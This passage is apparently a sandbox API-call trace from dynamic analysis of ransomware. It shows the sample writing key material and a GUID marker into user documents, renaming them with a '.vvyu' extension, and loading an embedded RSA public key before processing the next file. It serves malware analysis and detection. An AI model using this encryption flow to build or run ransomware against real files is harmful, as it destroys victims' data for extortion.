hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0186.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0186.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0186.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb40 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb10 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396a0 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39688 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0186.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0186.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0186.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0186.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0186.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0186.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0186.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0186.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0186.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0186.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0186.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0186.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0186.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb40 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0186.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0186.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0186.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0186.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d388c8 | out: hHeap=0x6a0000) returned 1 [0186.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0186.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0186.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0186.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0186.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0186.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0186.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0186.614] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x2dc4, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x2dc4, lpOverlapped=0x0) returned 1 [0186.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0186.615] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2dc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.615] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0186.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0186.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0186.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0186.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0186.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0186.616] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0186.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0186.616] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0186.616] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0186.617] CloseHandle (hObject=0x584) returned 1 [0186.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0186.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0186.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0186.618] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Z6ibw SvK.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\z6ibw svk.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Z6ibw SvK.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\z6ibw svk.xlsx.vvyu")) returned 1 [0186.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.619] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.623] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbd5de0, ftCreationTime.dwHighDateTime=0x1d8a472, ftLastAccessTime.dwLowDateTime=0xbf42e820, ftLastAccessTime.dwHighDateTime=0x1d8a6c9, ftLastWriteTime.dwLowDateTime=0xbf42e820, ftLastWriteTime.dwHighDateTime=0x1d8a6c9, nFileSizeHigh=0x0, nFileSizeLow=0x15724, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZSmCHocWuLlaLZ-0Fsrc.ots", cAlternateFileName="ZSMCHO~1.OTS")) returned 1 [0186.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d388c8 [0186.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0186.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d388c8 | out: hHeap=0x6a0000) returned 1 [0186.624] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\ZSmCHocWuLlaLZ-0Fsrc.ots") returned=".ots" [0186.624] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ZSmCHocWuLlaLZ-0Fsrc.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\zsmchocwullalz-0fsrc.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0186.625] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=87844) returned 1 [0186.625] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0186.630] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x156fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.630] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0186.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.634] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.634] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x15724, lpOverlapped=0x0) returned 1 [0186.635] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0186.635] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.635] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.635] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0186.636] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0186.636] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0186.636] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0186.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0186.636] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0186.636] GetLastError () returned 0x0 [0186.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.636] GetLastError () returned 0x0 [0186.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.637] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0186.637] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0186.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0186.637] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0186.637] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0186.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.637] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0186.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x15720) returned 0x2d43778 [0186.638] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0186.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d388c8 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eac8 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38910 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb40 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0186.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0186.639] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0186.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0186.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0186.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0186.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0186.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4eae0 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0186.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: 